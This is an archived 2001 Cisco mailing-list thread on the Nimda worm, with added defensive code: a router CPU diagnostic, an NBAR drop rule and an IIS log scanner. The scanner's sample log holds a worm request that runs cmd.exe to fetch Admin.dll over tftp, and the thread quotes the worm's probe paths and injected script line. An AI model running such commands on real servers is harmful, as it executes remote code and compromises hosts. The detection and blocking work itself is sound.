This should serve as an object lesson in troubleshooting. It is an important
skill to be able to separate the symptom from the cause.

When Code Red first broke out a couple of months ago, there were posts on
Groupstudy asking how to solve a problem of high CPU utilization on network
routers. Some folks were looking for configuration changes, or IOS upgrades,
or faulty hardware as causes.

I believe a certain Big Bank out here in California went so far as to shut
down a number of its routers because they were unable to determine the cause
of the problem they were experiencing - which was a large number of internal
web servers having been compromised by Code Red.

I was in a training class yesterday, and my first experience with Nimda was
when I walked through the door last night and my wife complained about how
the internet wasn't working. My first thought was that some of the changes I
had made to my firewall were to blame, but then as I thought it out, I
realized that could not have been the case, for the simple reason that
things were fine yesterday morning when I left home, and this was after a
reboot of the firewall. In other words, the internet was working just fine
after the changes I had made, and there was no possibility of artifact.
Fortunately, my ISP e-mail server was reachable, and I was able to see from
the traffic on NANOG that there was indeed a widespread internet based
problem. A call to my ISP (who for some reason still believes that the best
way to report a problem is to visit their web site) resulted in a vague
message about "network problems" which was easy to interpret knowing what
was being reported on NANOG.

This is rambling now. The point being that high CPU utilization is a
symptom. Understanding router operation, and protocol behaviour, goes a long
way towards accurate troubleshooting.

Chuck

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of
Rik Guyler
Sent: Wednesday, September 19, 2001 6:52 AM
To: [EMAIL PROTECTED]
Subject: RE: Alert: Some sort of IIS worm seems to be propagating
[7:20388]


I was doing battle with this beastie last night until midnight.  This one's
very bad as it overwrites files with various ".eml" files, typically seen is
"readme.eml".  If you do a search on the local drives for the extension, you
will find numerous files (over 1600 in my case last night) found.

How does this relate to Cisco?  Well, I was originally called for a router
problem as the Internet browsing and email transfer was very slow and of
course the client's first thought was that there was a telco, router, DSU,
etc. issue.  I checked the router and the console (and VTY) was VERY slow.
I ran a "show processor cpu" and discovered the processor utilization was
nearly 100% and was staying there, which explains why the console was so
slow.  Upon deeper scrutiny, I found that "IP input" was the process using
most of the processor, which indicates that IP traffic is jamming the
router.  With this knowledge, I went after the worm, which unfortunately,
has no simple fix, at least at this time.  When I removed the server from
the network, the router was fine.

So, all of the engineers that are so Cisco focused that a mere virus doesn't
matter take heed - not everything can be judged on first impressions.

---
Rik Guyler
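The symptom Rik describes is visible in the output of the IOS command "show processes cpu": the totals line at the top, and one process ("IP Input") owning most of the process-level CPU. As an added example, not part of Rik's post or anything else on this page, here is a small Python parser that reads that output and says which of the usual cases it is looking at. The sample output is constructed to look like classic IOS, not a real capture, and the 80% "busy" threshold is an assumption of the example.

```python
import re

# Constructed sample of "show processes cpu" output from a router under
# worm-driven load. Not a real capture; the column layout matches classic IOS.
# The header is "five seconds: TOTAL%/INTERRUPT%"; the difference is process level.
SAMPLE = """\
CPU utilization for five seconds: 99%/12%; one minute: 98%; five minutes: 96%
 PID Runtime(ms)   Invoked  uSecs    5Sec   1Min   5Min TTY Process
   1         184    207231      0   0.00%  0.00%  0.00%   0 Load Meter
   2       39868      2004  19894   0.00%  0.03%  0.00%   0 Exec
  23      144820    331077    437   0.40%  0.37%  0.36%   0 ARP Input
  34     2215892   1284512   1724  85.12% 84.45% 83.03%   0 IP Input
  57       60412     11873   5088   0.24%  0.21%  0.20%   0 CEF process
"""

HEADER_RE = re.compile(
    r"CPU utilization for five seconds: (\d+)%/(\d+)%; "
    r"one minute: (\d+)%; five minutes: (\d+)%"
)
# PID Runtime Invoked uSecs 5Sec% 1Min% 5Min% TTY Process-name
ROW_RE = re.compile(
    r"^\s*(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+"
    r"([\d.]+)%\s+([\d.]+)%\s+([\d.]+)%\s+(\S+)\s+(.+?)\s*$"
)


def parse_show_processes_cpu(text):
    """Return (totals, processes) parsed from 'show processes cpu' output."""
    totals = None
    procs = []
    for line in text.splitlines():
        m = HEADER_RE.search(line)
        if m:
            totals = {
                "5sec": int(m.group(1)),
                "5sec_interrupt": int(m.group(2)),
                "1min": int(m.group(3)),
                "5min": int(m.group(4)),
            }
            continue
        m = ROW_RE.match(line)
        if m:
            procs.append({
                "pid": int(m.group(1)),
                "5sec": float(m.group(5)),
                "1min": float(m.group(6)),
                "5min": float(m.group(7)),
                "process": m.group(9),
            })
    return totals, procs


def diagnose(text, busy_threshold=80.0):
    """Classify the load: normal, interrupt-bound, a flood of process-switched
    IP packets (IP Input), or some other single busy process."""
    totals, procs = parse_show_processes_cpu(text)
    if totals is None or not procs:
        raise ValueError("unrecognized show processes cpu output")
    top = max(procs, key=lambda p: p["5min"])
    process_level = totals["5sec"] - totals["5sec_interrupt"]
    if totals["5min"] < busy_threshold:
        verdict = "cpu-normal"
    elif top["process"] == "IP Input" and top["5min"] >= busy_threshold / 2:
        # Packets are being punted to the process path instead of being
        # fast/CEF switched: the worm's scanning of thousands of new
        # destinations is the classic cause.
        verdict = "process-switched-ip-flood"
    elif totals["5sec_interrupt"] >= process_level:
        verdict = "interrupt-bound"
    else:
        verdict = f"busy-process:{top['process']}"
    return {
        "total_5min": totals["5min"],
        "interrupt_5sec": totals["5sec_interrupt"],
        "top_process": top["process"],
        "top_5min": top["5min"],
        "verdict": verdict,
    }


if __name__ == "__main__":
    print(diagnose(SAMPLE))
```

The distinction the verdict draws matters for the next step: a router that is interrupt-bound is simply forwarding a lot of traffic, whereas a router stuck in "IP Input" is process-switching packets it cannot fast-switch, which is what a worm scanning random addresses behind the router produces. In the second case the fix is on the host side, as Rik found, not in the router configuration.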

-----Original Message-----
From: Brad Ellis [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 2:30 AM
To: [EMAIL PROTECTED]
Subject: Re: Alert: Some sort of IIS worm seems to be propagating
[7:20366]


John Kaberna, ([EMAIL PROTECTED]), sent me the following info:

"  This may be what you are experiencing:

http://www.cert.org/current/current_activity.html#port80


Make sure you patch IIS if you haven't done so already.  Check to see
if you're already infected with Code Red and follow the instructions
to get rid of it.

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/sec
urity/bulletin/MS01-044.asp


You can also use NBAR to block Red Worm if you haven't done so
already.

http://www.cisco.com/warp/customer/63/nbar_acl_codered.shtml   "

-Brad Ellis
CCIE#5796
Network Learning Inc
[EMAIL PROTECTED]
used Cisco:  www.optsys.net
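The NBAR approach Brad's forwarded note points to works by classifying HTTP requests on their URL, marking the matching packets on the inbound interface, and dropping the marked packets with an access list on the outbound interface. What follows is an added configuration example written for this page, not text from the Cisco note or from any poster: the interface names, the ACL number 105 and the choice of DSCP value 1 are assumptions, and the "*cmd.exe*", "*root.exe*" and "*readme.eml*" patterns are added to the Code Red "*default.ida*" match because they are the paths and file name the later messages in this thread describe.

```text
! NBAR requires CEF switching.
ip cef
!
! Classify HTTP requests whose URL names the Code Red / Nimda probe targets.
class-map match-any http-hacks
 match protocol http url "*default.ida*"
 match protocol http url "*cmd.exe*"
 match protocol http url "*root.exe*"
 match protocol http url "*readme.eml*"
!
! Mark matching packets as they arrive (DSCP 1 is assumed to be otherwise unused).
policy-map mark-inbound-http-hacks
 class http-hacks
  set ip dscp 1
!
interface Serial0/0
 description Internet uplink (assumed name)
 service-policy input mark-inbound-http-hacks
!
! Drop the marked packets on the way out toward the web servers.
access-list 105 deny ip any any dscp 1 log
access-list 105 permit ip any any
!
interface FastEthernet0/0
 description server LAN (assumed name)
 ip access-group 105 out
```

Two caveats a practitioner should keep in mind: this only covers the HTTP vector, so the e-mail attachment and the infected HTML pages described further down the thread still need to be handled on the hosts, and URL classification adds work to a router whose CPU is already the complaint, so check "show processes cpu" again after applying it.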
""Farhan Ahmed""  wrote in message
[EMAIL PROTECTED]">news:[EMAIL PROTECTED]...
> -----Original Message-----
> From: Simon Clausen [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, September 19, 2001 12:49 AM
> To: [EMAIL PROTECTED]
> Subject: Re: Alert: Some sort of IIS worm seems to be propagating
>
>
> Sent on behalf of Rich Zuris ([EMAIL PROTECTED]) due to his network
> being taken offline by the worm.
>
> Following is a list of recorded changes made to NT4 SP6a with Q299444
> rollup security patches.
>
> The following is appended to EVERY HTML file on the machine:
> window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000")
>
> Just about every directory on the machine has one or more files with
> extension .eml, mostly readme.eml but also other names that seem to
> correspond to directory or other filenames.  Total of 1234 .eml files
> created, totalling 98Mb (about 78Kb each).  Also got 55 files with
> extension .nws, containing exact same content.  Both .eml and .nws files
> can be opened by Outlook Express.
>
> Virus makes numerous outbound connections to port 80 to propagate itself
> to other servers.
>
> Virus sets IE5 to IE4 compatibility mode (apparently to circumvent
> security) and crashes Explorer.exe when IE is launched.  IExplore.exe
> appears to be hacked, and there is now a hidden IExplore .exe (note the
> space before the extension) in same directory.
>
> Virus code in stealth executable file with name tftp###, where ### is
> any numeric string.  File has no extension, but it is definitely a
> Windows executable.  This file is placed into \Program Files\Common
> Files\System\MSADC, and in same directory, Admin.dll appears to be
> hacked.
>
> IIS console hacked:  New MMC.EXE placed in \WINNT directory, which may
> override original version in \WINNT\System32.
>
> EXE files placed into TEMP directory.  Note that most/all hacked EXE
> files are flagged Hidden.
>
> Riched20.dll files placed in random directories (not on PATH, not
> containing executables).
>
> NT Account "Guest" was made a member of the NT "Administrators" group!
>
> Regards,
>
> Simon Clausen
>
> -----Original Message-----
> From: Windows NTBugtraq Mailing List
> [mailto:[EMAIL PROTECTED]] On Behalf Of Russ
> Sent: Wednesday, 19 September 2001 1:21 AM
> To: [EMAIL PROTECTED]
> Subject: Alert: Some sort of IIS worm seems to be propagating
>
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> There have been numerous reports of IIS attacks being generated by
> machines over a broad range of IP addresses. These "infected" machines
> are using a wide variety of attacks which attempt to exploit already
> known and patched vulnerabilities against IIS.
>
> It appears that the attacks can come both from email and from the
> network.
>
> A new worm, being called w32.nimda.amm, is being sent around. The
> attachment is called README.EXE and comes as a MIME-type of
> "audio/x-wav" together with some html parts. There appears to be no text
> in this message when it is displayed by Outlook when in Auto-Preview
> mode (always a good indication there's something not quite right with an
> email.)
>
> The network attacks against IIS boxes are a wide variety of attacks.
> Amongst them appear to be several attacks that assume the machine is
> compromised by Code Red II (looking for ROOT.EXE in the /scripts and
> /msadc directory, as well as an attempt to use the /c and /d virtual
> roots to get to CMD.EXE). Further, it attempts to exploit numerous other
> known IIS vulnerabilities.
>
> One thing to note is the attempt to execute TFTP.EXE to download a file
> called ADMIN.DLL from (presumably) some previously compromised box.
>
> Anyone who discovers a compromised machine (a machine with ADMIN.DLL in
> the /scripts directory), please forward me a copy of that .dll ASAP.
>
> Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the
> following;
>
> edit %systemroot/system32/drivers/etc/services.
>
> change the line;
>
> tftp 69/udp
>
> to;
>
> tftp 0/udp
>
> thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows
> File Protection so can't be removed.
>
> More information as it arises.
>
> Cheers,
> Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP Personal Privacy 6.5.2
>
> iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH
> Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6
> iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO
> hSW7yN2lhJc=
> =YAwc
> -----END PGP SIGNATURE-----
>




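The probe sequence Russ describes in the quoted NTBugtraq alert (ROOT.EXE in /scripts and /msadc, the /c and /d virtual roots leading to CMD.EXE, and a TFTP fetch of ADMIN.DLL) shows up in a web server's own access log, and the HTTP status code tells you whether your server merely received the probe or actually executed it. The following Python is an added example, not code from any poster on this page: it runs that detection over a few constructed IIS W3C-format log lines. The field layout, the IP addresses, and the generic rule that any other path ending in cmd.exe counts as a traversal attempt are assumptions of the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, unquote_plus

# Constructed IIS W3C-style log lines, not a real capture. They mimic the
# probe sequence from the NTBugtraq alert, followed by one benign request.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-19 06:52:01 10.0.0.5 GET /scripts/root.exe /c+dir 404
2001-09-19 06:52:01 10.0.0.5 GET /MSADC/root.exe /c+dir 404
2001-09-19 06:52:02 10.0.0.5 GET /c/winnt/system32/cmd.exe /c+dir 200
2001-09-19 06:52:02 10.0.0.5 GET /d/winnt/system32/cmd.exe /c+dir 404
2001-09-19 06:52:05 10.0.0.5 GET /c/winnt/system32/cmd.exe /c+tftp%20-i%2010.0.0.5%20GET%20Admin.dll 200
2001-09-19 06:53:10 192.168.1.20 GET /default.htm - 200
"""

# Most specific first; the first match wins.
INDICATORS = [
    ("codered2-backdoor", re.compile(r"^/(scripts|msadc)/root\.exe$", re.I)),
    ("virtual-root-cmd", re.compile(r"^/[cd]/winnt/system32/cmd\.exe$", re.I)),
    ("traversal-cmd", re.compile(r"cmd\.exe$", re.I)),  # assumed generic rule
]
# The command tail the alert singles out: tftp.exe pulling ADMIN.DLL.
TFTP_RE = re.compile(r"\btftp\b.*\badmin\.dll\b", re.I)


def classify(uri_stem, uri_query):
    """Return the indicator names that fire for one request, or []."""
    stem = unquote(uri_stem)
    query = unquote_plus(uri_query) if uri_query != "-" else ""
    tags = []
    for name, rx in INDICATORS:
        if rx.search(stem):
            tags.append(name)
            break
    if tags and TFTP_RE.search(query):
        tags.append("tftp-admin-dll")
    return tags


def parse_w3c(text):
    """Yield one dict per log record, using the #Fields: line for keys."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if fields is None or len(parts) != len(fields):
            continue
        yield dict(zip(fields, parts))


def find_infected_sources(text):
    """Per source IP: indicators seen, hit count, and whether our server
    answered a root.exe/cmd.exe request with 200 (i.e. it ran the command)."""
    report = defaultdict(
        lambda: {"tags": set(), "hits": 0, "server_answered_200": False}
    )
    for rec in parse_w3c(text):
        tags = classify(rec["cs-uri-stem"], rec["cs-uri-query"])
        if not tags:
            continue
        entry = report[rec["c-ip"]]
        entry["tags"].update(tags)
        entry["hits"] += 1
        if rec["sc-status"] == "200":
            entry["server_answered_200"] = True
    return dict(report)


if __name__ == "__main__":
    for ip, entry in find_infected_sources(SAMPLE_LOG).items():
        print(ip, sorted(entry["tags"]), entry["hits"], entry["server_answered_200"])
```

Read the output with the distinction in mind: a source that triggers only 404s is an infected machine elsewhere scanning you, while a 200 on a cmd.exe or root.exe request means your server executed the command and belongs on the list of compromised hosts to pull off the network, as Rik did. Because the worm also arrives by e-mail and through the readme.eml files Simon describes, a clean web log does not by itself clear a host.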
Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=20433&t=20433
--------------------------------------------------
FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html
Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]